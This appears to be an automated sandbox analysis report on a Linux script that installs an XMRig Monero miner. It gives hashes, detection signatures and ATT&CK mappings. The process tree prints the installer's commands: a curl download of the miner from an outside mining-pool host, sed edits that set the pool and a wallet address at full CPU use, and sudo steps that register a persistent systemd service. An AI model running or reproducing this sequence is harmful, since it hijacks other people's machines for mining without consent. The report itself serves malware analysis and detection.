xmrig_linux | 78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

max time kernel
52s
max time network
1789s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
25-02-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script_malware/ta.sh
Size

9KB
MD5

83821e27601305f76432759042d2c2a2
SHA1

ad255cce6b52d77b8791d2539667ebcefb5113d1
SHA256

03f1490eb936b54330934b4e677a12b11c3acf2b0e4ca97c6c21ee3dc5a381fb
SHA512

0570993f37ce4a0405f837e7e732f428e783e732c97a8c565bc73475542375bc30c6e2b7791d77566de104b426994571c5e1ae9818655e656aa4ebc62cc61864
SSDEEP

192:R9FFa1GIJz8c104etI1Dd7mf85tunuFc8kIvTKxP4CUqQv2a44rKmmcDK9K7omhA:RjEAem4TNruwrCUqQua44rnm+2v47vGT

Score

10^/10

xmrig_linux antivm infostealer miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
Executes dropped EXE 1 IoCs

Processes:

xmrig

ioc pid process

/tmp/c3pool/xmrig 2082 xmrig

ioc	pid	process
/tmp/c3pool/xmrig	2082	xmrig

Reads EFI boot settings 4 IoCs

Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.

infostealer

Processes:

systemctlsystemctlsystemctlsystemctl

description	ioc	process
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl

UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

/tmp/c3pool/xmrig upx
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

xmrig

description ioc process

File opened for reading /proc/cpuinfo xmrig

resource	yara_rule
/tmp/c3pool/xmrig	upx

description	ioc	process
File opened for reading	/proc/cpuinfo	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig

Enumerates kernel/hardware configuration 1 TTPs 23 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

xmrigsystemctlsystemctlsystemctlsystemctl

description	ioc	process
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	xmrig
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

killallkillallsudoxmrigsudosystemctlsystemctlsystemctlmvsed

description	ioc	process
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/160/stat	killall
File opened for reading	/proc/1048/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/906/stat	killall
File opened for reading	/proc/1052/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/1233/stat	killall
File opened for reading	/proc/self/exe	xmrig
File opened for reading	/proc/272/stat	killall
File opened for reading	/proc/1102/stat	killall
File opened for reading	/proc/815/stat	killall
File opened for reading	/proc/91/stat	killall
File opened for reading	/proc/1306/stat	killall
File opened for reading	/proc/675/stat	killall
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/82/stat	killall
File opened for reading	/proc/1131/stat	killall
File opened for reading	/proc/1468/stat	killall
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/169/stat	killall
File opened for reading	/proc/171/stat	killall
File opened for reading	/proc/200/stat	killall
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/75/stat	killall
File opened for reading	/proc/444/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/564/stat	killall
File opened for reading	/proc/576/stat	killall
File opened for reading	/proc/1102/stat	killall
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/1101/stat	killall
File opened for reading	/proc/1443/stat	killall
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/553/stat	killall
File opened for reading	/proc/906/stat	killall
File opened for reading	/proc/1089/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/459/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/175/stat	killall
File opened for reading	/proc/70/stat	killall
File opened for reading	/proc/173/stat	killall
File opened for reading	/proc/618/stat	killall
File opened for reading	/proc/1093/stat	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/1086/stat	killall
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/633/stat	killall
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/1089/stat	killall
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/162/stat	killall
File opened for reading	/proc/639/stat	killall
File opened for reading	/proc/1119/stat	killall
File opened for reading	/proc/1473/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/1105/stat	killall

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

Processes:

tarsedcurlsedsedsedsedsedcpsedsed

description	ioc	process
File opened for modification	/tmp/c3pool/xmrig	tar
File opened for modification	/tmp/c3pool/sedHLCgXw	sed
File opened for modification	/tmp/sh-thd.qOZWYf
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/c3pool/sedQXq7Hg	sed
File opened for modification	/tmp/c3pool/sedTGGrir	sed
File opened for modification	/tmp/sh-thd.5Vv4tI
File opened for modification	/tmp/c3pool/sedp3s2F7	sed
File opened for modification	/tmp/c3pool/sed9zgv1a	sed
File opened for modification	/tmp/c3pool/sedDrRPTo	sed
File opened for modification	/tmp/c3pool/config_background.json	cp
File opened for modification	/tmp/c3pool_miner.service
File opened for modification	/tmp/c3pool/config.json	tar
File opened for modification	/tmp/c3pool/sedh4lwgk	sed
File opened for modification	/tmp/c3pool/sedBwi7bE	sed
File opened for modification	/tmp/c3pool/miner.sh

/tmp/script_malware/ta.sh
/tmp/script_malware/ta.sh
1⤵
PID:1468
- /usr/bin/sudo
  sudo -n true
  2⤵
  PID:1472
- - /usr/bin/true
    true
    3⤵
    PID:1476
- /usr/bin/nproc
  nproc
  2⤵
  PID:1477
- /usr/bin/sudo
  sudo -n true
  2⤵
  PID:1481
- - /usr/bin/true
    true
    3⤵
    PID:1482
- /usr/bin/sudo
  sudo systemctl stop c3pool_miner.service
  2⤵
  PID:1483
- - /usr/bin/systemctl
    systemctl stop c3pool_miner.service
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1484
- /usr/bin/killall
  killall -9 xmrig
  2⤵
  - Reads runtime system information
  PID:1485
- /usr/bin/rm
  rm -rf /tmp/c3pool
  2⤵
  PID:1486
- /usr/bin/curl
  curl -L --progress-bar http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1487
- /usr/bin/mkdir
  mkdir /tmp/c3pool
  2⤵
  PID:2077
- /usr/bin/tar
  tar xf /tmp/xmrig.tar.gz -C /tmp/c3pool
  2⤵
  - Writes file to tmp directory
  PID:2078
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:2079
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:2079
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:2079
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:2079
- /usr/bin/rm
  2⤵
  PID:2080
- /usr/bin/sed
  2⤵
  - Writes file to tmp directory
  PID:2081
- /tmp/c3pool/xmrig
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2082
- /usr/bin/sed
  sed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"auto.c3pool.org:19999\",/" /tmp/c3pool/config.json
  2⤵
  - Writes file to tmp directory
  PID:2088
- /usr/bin/sed
  sed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"41pMnZ1uYbDPmUPnxXA3GEjSBQfbhUQbT9yPbXQRvR2VNSB3NqCkH7xcjZfKHwCRdZj5YzwGaSkYyEKRBRPTXo2cM3RtTnH\",/" /tmp/c3pool/config.json
  2⤵
  - Writes file to tmp directory
  PID:2089
- /usr/bin/sed
  sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"cloud\",/" /tmp/c3pool/config.json
  2⤵
  - Writes file to tmp directory
  PID:2090
- /usr/bin/sed
  sed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /tmp/c3pool/config.json
  2⤵
  - Writes file to tmp directory
  PID:2091
- /usr/bin/sed
  sed -i "s#\"log-file\": *null,#\"log-file\": \"/tmp/c3pool/xmrig.log\",#" /tmp/c3pool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2092
- /usr/bin/sed
  sed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /tmp/c3pool/config.json
  2⤵
  - Writes file to tmp directory
  PID:2093
- /usr/bin/cp
  cp /tmp/c3pool/config.json /tmp/c3pool/config_background.json
  2⤵
  - Writes file to tmp directory
  PID:2094
- /usr/bin/sed
  sed -i "s/\"background\": *false,/\"background\": true,/" /tmp/c3pool/config_background.json
  2⤵
  - Writes file to tmp directory
  PID:2095
- /usr/bin/cat
  cat
  2⤵
  PID:2096
- /usr/bin/chmod
  chmod +x /tmp/c3pool/miner.sh
  2⤵
  PID:2097
- /usr/bin/sudo
  sudo -n true
  2⤵
  PID:2098
- - /usr/bin/true
    true
    3⤵
    PID:2099
- /usr/bin/cat
  cat
  2⤵
  PID:2103
- /usr/bin/sudo
  sudo mv /tmp/c3pool_miner.service /etc/systemd/system/c3pool_miner.service
  2⤵
  - Reads runtime system information
  PID:2104
- - /usr/bin/mv
    mv /tmp/c3pool_miner.service /etc/systemd/system/c3pool_miner.service
    3⤵
    - Reads runtime system information
    PID:2105
- /usr/bin/sudo
  sudo killall xmrig
  2⤵
  - Reads runtime system information
  PID:2106
- - /usr/bin/killall
    killall xmrig
    3⤵
    - Reads runtime system information
    PID:2107
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  PID:2108
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2109
- /usr/bin/sudo
  sudo systemctl enable c3pool_miner.service
  2⤵
  PID:2145
- - /usr/bin/systemctl
    systemctl enable c3pool_miner.service
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    PID:2147
- /usr/bin/sudo
  sudo systemctl start c3pool_miner.service
  2⤵
  PID:2174
- - /usr/bin/systemctl
    systemctl start c3pool_miner.service
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2175
- /usr/bin/tail
  tail -n1 /etc/rc.local
  2⤵
  PID:2177

/usr/bin/cut
cut -f1 -d.
1⤵
PID:1471

/usr/bin/bc
bc -l
1⤵
PID:1480

/usr/bin/sed
sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
1⤵
PID:2087

/usr/bin/cut
cut -f1 -d.
1⤵
PID:2086

/usr/bin/hostname
hostname
1⤵
PID:2085

/usr/bin/awk
awk "{print \$2}"
1⤵
PID:2102

/usr/bin/grep
grep MemTotal /proc/meminfo
1⤵
PID:2101

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/c3pool/config.json

Filesize
2KB

MD5
eacca315516ac1e67cf8186125e8c91d

SHA1
02cebcdac9468f863f491a508b87e649d24db04d

SHA256
4930e0eb9d62e77c7295900508edd8502880ecccbebf727f5ab353f94dc3419a

SHA512
5275a8675375047d122432950a5d0eb8f27c9aafcaeb132ecd4a0da55ce3a627320973b073229b27dc0d2d23f174a7d5640072280b70fcfb6d011c7f8bf7cf88

Download Submit
/tmp/c3pool/sed9zgv1a

Filesize
2KB

MD5
59b14bca9b265fd7648a9091261c2acd

SHA1
234f71e7d39ef7eb79ecdb898e215acbc9b36e19

SHA256
babcd52790989359215305710aab2d4d82855c9ccfbe8f309fc7de9f2a25cb57

SHA512
a4bfd809b466a26796647a0bdc54004adfc5bce640cdde90d203b5cfda439c22a99636e8ee6da8dc8a9841c0f6fa989c5abbe40bdcd594a5d3ba70b284f46f45

Download Submit
/tmp/c3pool/sedBwi7bE

Filesize
2KB

MD5
4856b7e549df95ed77aedd17f8b81abd

SHA1
07778cee487d63d59fc2cd1bb3b009459646c31a

SHA256
6f1195924119189cb14bafdd3d0cb2b71f83422afa3bcd55012bb4574675c75b

SHA512
afc317ebc688c25fd849886a0f27c23f048a2957b606f5529d097057872c2b3bf6a78d57348d2067b35cb94752b9f1fc0ab7530e0a6976ac93e130a07bd3bf8d

Download Submit
/tmp/c3pool/sedDrRPTo

Filesize
2KB

MD5
51d895d8907af2d053653e2772803bfa

SHA1
703e99aea01a77d0738c798c6263629738dc4228

SHA256
4cbbc5c31074ba9ac2a0f07133268e710c2799246feb01b48cabe67516fd8770

SHA512
a73464760ccee901b42d8327a02e7278966421f4fb72b7fda386b378261d92fc3e76126a54bc8b6915cb25f1b75abc943bdd672c7ef5261018851fd7ddf135e2

Download Submit
/tmp/c3pool/sedQXq7Hg

Filesize
2KB

MD5
917be28650ce104f0b10b7a1b34044ba

SHA1
5425e3e5f1488e2ee5ec3cc160371d66fd10865a

SHA256
442bfe229a46723ca33d347e6271f1159453dfbd208b309da2c57d1c6a0a0357

SHA512
47f5c4718ee5d24c1d3ddffd0f7a21bdc8fc75dab7e3b18ee05d56cdc81b7ebe17a0764e727cfd8146aba3fd4040f1314da35e26175798ee8b87d3f18b6adc52

Download Submit
/tmp/c3pool/sedTGGrir

Filesize
2KB

MD5
4d55986e216ae2275e19167cf6275014

SHA1
6fc8369e476b05373c11e06a89928b17bf5278dc

SHA256
a86af0a446c390a6c79b5fad099473097ded624e512b430628b4ba90a40df094

SHA512
e13c1cb9c7b90001ffc3db21e16d44b8562200f897feb9ce9d7208cc3d24c8f0b1bf8d28c3583034abc19240cf6e32b135653270d209ac107a1e2bc7deb6f901

Download Submit
/tmp/c3pool/xmrig

Filesize
2.1MB

MD5
a8fb28321b888ca3fa7a26b0a0b36df2

SHA1
60b5059ef897ef9a450895f406c996cbb24d7ec4

SHA256
a14da94d943777f9b7256d4d3688f8b8e79f2b5f3b6bad55cf10b4025118fdc6

SHA512
5759f9aa91e5c8826b20aa06cb1ef2a7f955fab7e069a235e7c55691bbcf4655d5a9e13ef0095f9c33da766c5494029f92719c9644fb3fab1ac22fecf5838443

Download Submit
/tmp/c3pool_miner.service

Filesize
185B

MD5
88b5120badc7d0f718f3f817ade4d35e

SHA1
09481bfd5a93220dd8d6b19faa8d07a31b79d495

SHA256
d80f15997a8bca20b23964e8ed25ebc1c2945bb424d0160e4cef199a66b990fe

SHA512
c5e958c17b647546a54d160203fa38c5dde891261d1605beab5d0c5eefd118f30f502391087519c3613434370c7d27016408daa615e9efd2eb46c73d9acfe4fe

Download Submit
/tmp/sh-thd.5Vv4tI

Filesize
444B

MD5
7006b637d5828f209686977f77faaddf

SHA1
60ac7310e8dab0acab64dcc14a795b8131dd06d4

SHA256
4939c36afdb1993ff772cc5f0385efefc24e9dffe948aa03780f819c4843ef59

SHA512
bf7ef50fdadb6c30c6101ef5a01d9884a15b1b1ab9e3802d040f5460c0953453a309c06ad911a27cfa7865b4fa39ca419e914ce288ebc61f031de6c8210a7cb3

Download Submit
/tmp/xmrig.tar.gz

Filesize
32KB

MD5
52c104bbd03ac63a6a3a6624ac43b314

SHA1
8886aefed2d0c44ae64be0fbcc98c7cc22005ac4

SHA256
db8bf931dd5b5ff86626cdf66951b6bca3ff04ec2808be8961c72aa8138e4f6e

SHA512
bb8e5a219a21c3608fb0e1ca0b6ae4b5adcb14f97974263cf48888803462a2399c0e1eadb1f0697d487edbf781147621b37b0a594b0174ca6d3dff7624e06aa3

Download Submit
memory/2082-1-0x0000000000400000-0x0000000000b7ba78-memory.dmp

Download